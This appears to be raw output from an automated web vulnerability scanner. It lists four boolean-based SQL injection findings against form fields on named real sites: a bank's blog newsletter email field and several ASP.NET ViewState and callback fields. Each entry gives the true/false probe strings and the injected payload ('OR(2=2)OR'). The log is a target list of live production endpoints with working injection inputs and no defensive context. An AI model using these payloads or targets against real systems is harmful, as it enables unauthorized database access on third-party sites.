Url: https://www.tangerine.ca/forwardthinking/savings/starting-an-emergency-fund-as-a-university-student?utm_campaign=tang_seasonal&utm_medium=tang_social&utm_source=twitter&utm_content=0519, Injection: InjectionType.Sqli_PostForm_Bool, Details: SqliManager bool FORM size! TRUE:'OR(1=1)OR' ; FALSE:'OR(1=2)OR', Payload: {'sidebar_subscriber_email': "'OR(2=2)OR'"}
Url: https://www.tangerine.ca/forwardthinking/savings/starting-an-emergency-fund-as-a-university-student?utm_campaign=tang_seasonal&utm_medium=tang_social&utm_source=twitter&utm_content=0519, Injection: InjectionType.Sqli_PostForm_Bool, Details: SqliManager bool FORM size! TRUE:"OR(1=1)OR" ; FALSE:"OR(1=2)OR", Payload: {'sidebar_subscriber_email': '"OR(2=2)OR"'}
Url: https://isprox.epreselec.com/WebResource.axd?d=pynGkmcFUV13He1Qd6_TZJ11WzOZmik8YpPYehTpHfFD-WKeGi6c44xs7NzZgqmnRXEUUXk4ghl9PZTKFEnEaw2&t=637454104754849868, Injection: InjectionType.Sqli_PostForm_Bool, Details: SqliManager bool FORM size! TRUE:"OR(1=1)OR" ; FALSE:"OR(1=2)OR", Payload: {'__CALLBACKLOADSCRIPT': '"OR(2=2)OR"'}
Url: https://isprox.epreselec.com/ScriptResource.axd, Injection: InjectionType.Sqli_PostForm_Bool, Details: SqliManager bool FORM size! TRUE:'OR(1=1)OR' ; FALSE:'OR(1=2)OR', Payload: {'__VIEWSTATEFIELDCOUNT': '3', '__VIEWSTATE': 'G0rjW3bnDxYBjF6woSjqQGrkJ0D30DL8o7RzO3bhJAt7PyuWtDzGA5jiNpYKQt3BZ/r43uLqAPlGnY9NArqgfwDux8Q25ecOtRNf', '__VIEWSTATE1': 'Sr3BPwTmJQNWt4/2rw10ayUanMZGfGoG4Z5Gaw09kwgk7rwJIcWVo2tvN9gShCVNbGXH9xCDxZgzM/bEjG55HawfO7kPnF/egTEV', '__VIEWSTATE2': "'OR(2=2)OR'", '__VIEWSTATEGENERATOR': '193A34DB'}
